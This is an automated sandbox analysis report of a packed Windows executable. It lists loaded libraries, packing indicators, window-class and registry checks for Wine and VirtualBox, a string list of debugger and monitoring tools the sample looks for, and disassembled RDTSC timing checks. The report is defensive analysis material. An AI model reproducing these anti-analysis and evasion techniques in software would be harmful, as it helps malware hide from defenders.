Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: kernel.appcore.dllJump to behavior
Source: t6VDbnvGeN.exeStatic file information: File size 4454912 > 1048576
Source: t6VDbnvGeN.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: t6VDbnvGeN.exeStatic PE information: Raw size of jyayxkzc is bigger than: 0x100000 < 0x1b7200

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeUnpacked PE file: 1.2.t6VDbnvGeN.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jyayxkzc:EW;tlfatyfb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jyayxkzc:EW;tlfatyfb:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: t6VDbnvGeN.exeStatic PE information: real checksum: 0x444872 should be: 0x445cdc
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: t6VDbnvGeN.exeStatic PE information: section name: .idata
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: t6VDbnvGeN.exeStatic PE information: section name: jyayxkzc
Source: t6VDbnvGeN.exeStatic PE information: section name: tlfatyfb
Source: t6VDbnvGeN.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADD534 push esp; retf 1_3_01ADD535
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADD534 push esp; retf 1_3_01ADD535
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADCA78 push 5401ACC5h; retf 1_3_01ADCA85
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADCA78 push 5401ACC5h; retf 1_3_01ADCA85
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01AD4B49 push B5FBD157h; iretd 1_3_01AD4B54
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADD534 push esp; retf 1_3_01ADD535
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADD534 push esp; retf 1_3_01ADD535
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADCA78 push 5401ACC5h; retf 1_3_01ADCA85
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADCA78 push 5401ACC5h; retf 1_3_01ADCA85
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01AD4B49 push B5FBD157h; iretd 1_3_01AD4B54
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B441D0 push eax; mov dword ptr [esp], edx1_2_00B441D5
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00842340 push eax; mov dword ptr [esp], 00000000h1_2_00842343
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0087C7F0 push eax; mov dword ptr [esp], 00000000h1_2_0087C743
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00800AC0 push eax; mov dword ptr [esp], 00000000h1_2_00800AC4
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00821430 push eax; mov dword ptr [esp], 00000000h1_2_00821433
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_008439A0 push eax; mov dword ptr [esp], 00000000h1_2_008439A3
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0081DAD0 push eax; mov dword ptr [esp], edx1_2_0081DAD1
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B49F40 push dword ptr [eax+04h]; ret 1_2_00B49F6F
Source: t6VDbnvGeN.exeStatic PE information: section name: jyayxkzc entropy: 7.954718124398861

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: PROCMON.EXE
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: X64DBG.EXE
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WINDBG.EXE
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1085C51 second address: 1085C83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1C28FAFD75h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1085DEC second address: 1085DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1085DF0 second address: 1085DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1088849 second address: 108884F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 108884F second address: 1088853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1088926 second address: 108892B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 108892B second address: 1088932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 109A5FA second address: 109A61A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F1C29045F1Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1C29045F0Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 109A61A second address: 109A61E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107C7D0 second address: 107C7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1C29045F06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107C7DF second address: 107C7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107C7E3 second address: 107C7E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107C7E7 second address: 107C7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7886 second address: 10A78F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F1C29045F17h 0x0000000c push edi 0x0000000d jnl 00007F1C29045F06h 0x00000013 jmp 00007F1C29045F14h 0x00000018 pop edi 0x00000019 jnc 00007F1C29045F18h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F1C29045F15h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A78F0 second address: 10A78F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7A47 second address: 10A7A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7A53 second address: 10A7A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7A57 second address: 10A7A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7D5D second address: 10A7D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7D61 second address: 10A7D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1C29045F0Dh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7EEB second address: 10A7EF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1C28FAFD68h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A7EF9 second address: 10A7EFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A8482 second address: 10A8487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A85F9 second address: 10A8612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F15h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A8612 second address: 10A861B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A8731 second address: 10A874E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A874E second address: 10A8778 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1C28FAFD68h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1C28FAFD6Ah 0x0000000f jmp 00007F1C28FAFD74h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A8778 second address: 10A87A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F14h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e jmp 00007F1C29045F0Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 109E616 second address: 109E61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 109E61A second address: 109E641 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F1C29045F06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F1C29045F0Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 jmp 00007F1C29045F0Ah 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107E138 second address: 107E13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107E13E second address: 107E142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107E142 second address: 107E154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F1C28FAFD66h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107E154 second address: 107E158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107E158 second address: 107E15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107E15E second address: 107E17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F1C29045F06h 0x00000010 jmp 00007F1C29045F10h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A9183 second address: 10A9187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A9187 second address: 10A9197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A92CA second address: 10A92E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F1C28FAFD72h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95AD second address: 10A95B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95B4 second address: 10A95B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95B9 second address: 10A95BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95BE second address: 10A95E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1C28FAFD66h 0x0000000a jnc 00007F1C28FAFD66h 0x00000010 popad 0x00000011 ja 00007F1C28FAFD68h 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e jc 00007F1C28FAFD66h 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95E3 second address: 10A95E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95E8 second address: 10A95F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1C28FAFD66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10A95F4 second address: 10A960F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1C29045F12h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10ABCDA second address: 10ABCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10ABE12 second address: 10ABE1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10ABE1C second address: 10ABE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10AA7AF second address: 10AA7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F14h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10AEE5F second address: 10AEE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10AEE63 second address: 10AEE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1073FC7 second address: 1073FF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1C28FAFD85h 0x00000008 jne 00007F1C28FAFD66h 0x0000000e jmp 00007F1C28FAFD79h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3CD3 second address: 10B3CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1C29045F06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B30C1 second address: 10B30C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3220 second address: 10B3224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3516 second address: 10B351B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B394C second address: 10B3950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3950 second address: 10B3960 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1C28FAFD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3960 second address: 10B396C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B396C second address: 10B3970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3AAE second address: 10B3AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3AB2 second address: 10B3B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD79h 0x00000007 jmp 00007F1C28FAFD79h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jbe 00007F1C28FAFD66h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F1C28FAFD72h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3B0D second address: 10B3B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C29045F0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B3B1E second address: 10B3B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F1C28FAFD70h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6D55 second address: 10B6D5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6DE6 second address: 10B6DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6F0F second address: 10B6F15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
